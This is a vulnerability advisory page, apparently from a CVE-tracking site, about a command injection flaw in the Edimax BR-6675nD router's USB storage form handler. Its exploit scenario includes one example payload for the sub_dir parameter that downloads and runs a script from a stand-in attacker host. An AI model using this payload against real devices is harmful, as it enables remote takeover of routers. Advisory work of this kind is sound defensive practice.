Skip to main content

Edimax BR-6675nD CVE-2026-9400

| EUVD-2026-31603 LOW
Command Injection (CWE-77)
2026-05-24 VulDB GHSA-53r7-38m4-hpmp
Command Injection Br 6675Nd
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 13:26 vuln.today
Severity Changed
May 26, 2026 - 19:37 NVD
MEDIUM LOW
CVSS changed
May 26, 2026 - 19:37 NVD
6.3 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

A flaw has been found in Edimax BR-6675nD 1.12. This issue affects the function formUSBStorage of the file /goform/formUSBStorage of the component POST Request Handler. Executing a manipulation of the argument sub_dir can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Command injection in the Edimax BR-6675nD 1.12 router's web management interface allows remote authenticated attackers to execute arbitrary OS commands by manipulating the sub_dir parameter of POST requests to the /goform/formUSBStorage endpoint. The vulnerability stems from unsanitized input passed directly to a system-level command in the formUSBStorage function (CWE-77). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed Edimax BR-6675nD management interface
Delivery
Authenticate with low-privilege or default credentials
Exploit
Send crafted POST to /goform/formUSBStorage with malicious sub_dir value
Execution
Router passes unsanitized input to shell command
Impact
Arbitrary OS commands execute on device
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires low-privilege authentication (PR:L per CVSS 4.0 vector) to the Edimax BR-6675nD web management interface - any valid login credential suffices; administrator-level access is not required per the CVSS rating. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The published CVSS 4.0 score of 2.1 is a notable outlier for a network-reachable command injection with a public exploit. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege credentials to the Edimax BR-6675nD web management interface sends a crafted HTTP POST request to /goform/formUSBStorage with the sub_dir parameter set to a value containing shell metacharacters (e.g., sub_dir=test;wget+http://attacker/payload+-O+/tmp/x;sh+/tmp/x). The router's formUSBStorage function passes the unsanitized value directly into a shell command, executing the attacker's injected payload with the privileges of the web server process. …
Remediation No vendor-released patch is available at time of analysis; the vendor did not respond to disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9400 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy